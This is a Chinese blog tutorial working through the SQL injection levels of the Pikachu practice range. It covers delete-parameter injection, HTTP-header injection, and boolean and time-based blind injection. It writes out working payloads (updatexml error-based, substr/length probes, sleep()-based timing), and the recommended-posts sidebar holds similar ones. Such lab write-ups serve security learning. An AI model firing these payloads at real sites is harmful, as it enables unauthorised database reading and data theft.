pikachu靶场(sql注入)(delete和http头部注入和盲注)

最新推荐文章于 2024-05-19 20:34:40 发布
最新推荐文章于 2024-05-19 20:34:40 发布
阅读量3.6k 收藏 11
点赞数 1
分类专栏: # pikachu靶场(sql) 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54431413/article/details/123514045
版权

一、delete注入

1.截取数据包

2.在id=84的后面进行注入

(注入语句上update,insert几乎相同,但这里要写成url编码格式,空格写成%20或+)

注入语句:

+or+updatexml(1,concat(0x7e,version()),0)

3.之后获取版本号和用户,获取数据几近相同

二、http头部注入

1.首先登陆进去

2.在此界面点击退出进行抓包

黄色部分都可以试试,都可以注入

注入语句:

'  or  updatexml(1,concat(0x7e,user()),0)  or '

三、盲注

概述:在没有回显的情况下,用返回的结果来判断

1.布尔盲注

(1)首先输入 kobe' 返回不存在信息

(2)kobe'# 返回正确信息

(3)分别输入

kobe' and 1=1 # 返回正常

kobe' and 1=2 # 返回错误

可以判断存在字符型注入点

(4)进行数据库长度测试

kobe' and length(database())>=1 #

更改后面的参数来测试数据库名的长度当测试到

kobe' and length(database())>=8 #

返回错误。所以得知数据库长度为8

(5)数据库第一个字母尝试测试

  ①substr(a,b,c)用法 

a是字符串

b是从哪开始

c是截取几个

  ②因为数据库的第一个字母一般是0-9或a-z,所以挨个进行测试当测试到p时

kobe' and substr(database(),1,1)='p'#           

显示出正确信息,表示第一个字母是p

(6)在根据已知数据库知道数据库名,查询表名,最终知道第一个表的第

kobe' and substr((select table_name  from information_schema.tables where table_schema='pikachu' limit 0,1),1,1)='h'#

2.时间盲注

时间盲注主要根据响应时间的长短 来判断正确与否,时间注入是利用sleep()或benchmark()等函数让mysql的执行时间变长。时间盲注常用if(a,b,c),与三目运算类似符类似,a是条件,b是a成立时返回值,c是不成立时返回值。

1.首先可以来测试数据库长度,当测试到此

kobe' and if(length(database())>=8,sleep(4),null)#

页面及时响应。可知数据库为7位。

2.测试数据库第一个字符

kobe' and if((substr(database(),1,1))='p',sleep(5),null)#

依次对七个字符进行测试。

3.对表名进行测试(和布尔类似)

kobe' and if((substr((select table_name  from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))='h',sleep(5),null)#

梅_花_七
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
布尔盲注靶场
weixin_45540609的博客
04-17 307
bool盲注1 一、判断是否存在布尔盲注 二、使用Burp抓包 1、Burp抓包,payload设置1-128,爆破数据库名的长度 url输入如下命令,Burp抓包,设置payload id=1 and ascii(substr(database(),3,1)) =12 intruder attack启动后,抓取不正常的length的数据,如下,对应ascii码表,可得到数据库的表名 107 97 110 119 111 108 111 110 103 120 105 97 ..
pikachu——布尔盲注
Lollipop_zhi的博客
03-02 6551
基于boolean的盲注主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL注入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
pikachu靶场sql注入通关教程-下)
最新发布
记录学习
05-19 452
pikachu靶场sql注入下)
[Pikachu靶场实战系列] SQL注入盲注
00勇士王子的博客
07-29 3205
目录盲注布尔盲注时间盲注 盲注 盲注的意思就是说页面没有明显的回显,我们只能通过其他方式判断注入点。 常见的方式有两种,一种是布尔盲注,通过页面返回的不同状态判断语句是否被执行。另一种是时间盲注,通过页面加载时间来判断语句是否被执行。 布尔盲注 先输入一个之前关卡中的名字,返回正常 加上单引号,并没有报错,而是返回了我输入的信息不存在 加上注释符号后,返回又正常了,说明注入点存在,且就是单引号闭合 判断数据库名的长度 lucy’and length(database())>=1 # l
[Pikachu靶场实战系列] SQL注入delete注入/http注入
00勇士王子的博客
07-28 739
delete是删除的意思,我们肯定要有东西删,先随便输入一些留言。 点击删除抓包 在get数据中发现参数id,猜测id就是注入点,id参数后加单引号,报错了,说明注入点找对了 构建pyload (+的作用是代替空格) 56+or+updatexml(1,concat(0x7e,database()),0) 注意: 1.以下pyload在burp中需要使用Ctrl+U进行编码才能生效 2.和之前的一样,查询数据长度为31,所以要想将数据全部查询出来需要多次查询并拼接,我这里每次查询一次,不再拼.
dvwa和pikachu靶场盲注语句
waxcj的博客
11-13 827
dvwa时间盲注 pikachu布尔盲注
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
sql和xss等靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
pikachu靶场包含网络安全中常见的漏洞
11-08
这个靶场涵盖了XSS跨站脚本攻击、SQL注入、目录遍历、文件上传漏洞、文件包含漏洞以及远程执行等多种威胁,通过实践操作,用户可以提高自身的安全防护意识和技能。 1. **XSS(Cross-Site Scripting)跨站脚本攻击**...
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场--SQL inject--insert/update/delete/HTTP header注入/盲注【4.5】~【4.9】
lmei1228的博客
06-11 791
substr(database(),1,1)意思是把database()的结果取值,取从第1个字符开始的第1个字符,再包裹一层ascii(),意思是将取出的字符转换成ASCII码输出,这里我们的数据库名称为apache,所以结果依次为:a ,97。因此,我们可以构造闭合xxx' or updatexml(1,concat(0x7e,database()),0) or' ,这样,返回的报错内容里就有我们所需要的信息。但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的是时间,从而确定注入
pikachu 漏洞平台sql注入delete注入
安全界的彭于晏的博客
06-26 965
delete 注入 一般在删除的界面 可能存在 我们看到靶场有一个留言板 点击删除抓个包试试 参数后面解payload 试一试 接着在后面爆表名字 or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) or updatexml(1,concat(0x7e,subst
皮卡丘靶场sql注入
qq_43766053的博客
02-15 5913
1数字型注入(post) 这里,我们首先随便输入选择一个数字,然后用burp suite 抓包,如下图: post传递的数据是:id=1&submit=%E6%9F%A5%E8%AF%A2,接下来方便观看,我使用hackbar进行,也可以直接在BP上进行修改. 1.首先验证是否存在漏洞,这里我们知道是数字型,所以可以直接输入 payload:id=1 or 1=1&submit=%E6%9F%A5%E8%AF% 2.然后就是order by 寻找列数,一般使用二分法去从寻找,这里我直接给出答
pikachu SQL注入(http header)
ANYOUZHEN的博客
05-10 1048
将该页面进行抓包处理 将UA修改为' 查看后发现报错了,说明存在注入漏洞 将UA修改为: firefox' or updatexml(1,concat(0x7e,database()),0) or ' 得到数据库pikachu
pikachu~~~insert/update/delete,http注入
weixin_50339832的博客
05-30 740
@[TOC] select TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='pikachu' select TABLE_NAME, COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_NAME='users' select username,password from users# UPDATEXML (XML_document, XPa.
pikachu-SQL】delete注入,2022,超详细
weixin_46497491的博客
09-12 1373
个人理解显错注入原理:updatexml()第二位是xpath,显错注入的根本就是使用xpath不能识别的符号来进行报错,显示查询语句。此处因为有多个表名,所以需要limit来限制,limit 3,1:3代表从第几个表开始,1代表显示1个,此处出现了我们需要的users表即可。这个地方,因为显错注入最多只能显示32个字符,所以我们需要使用substring函数来控制一下,显示出未显示的结果,拼接在一起就可以了。1、在留言板处,尝试注入,发现无论输入什么都会显示在留言板下方,不是固定的注入点。
SQL注入-pikachu靶场
qq_43936524的博客
10-13 376
文章目录SQL注入概述SQL分类 SQL注入概述 SQL注入指的是通过将恶意SQL语句添加到应用的输入参数中,传递到后台被SQL服务器解析后执行的攻击。 SQL分类 数字型注入 输入查询id后抓包 改变参数1 = 1 or 1 字符型注入 ...
pikachu靶场通关sql注入
08-10
Pikachu靶场中,SQL注入是一种常见的攻击方法。参与者可以通过注入恶意代码来绕过应用程序的安全性,从而获取敏感信息或者对数据库进行修改。在注入的过程中,可以使用不同的技术和payload来实现攻击。例如,数字型注入、字符型注入、搜索型注入、XX型注入、insert注入delete注入http header注入盲注和宽字节注入等。你也可以使用Python脚本来进行注入测试,根据注入类型和目标网址构造合适的payload来发送请求。123 #### 引用[.reference_title] - *1* [Pikachu靶场sql注入通关](https://blog.csdn.net/oiadkt/article/details/129385178)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [pikachu靶场通关之sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值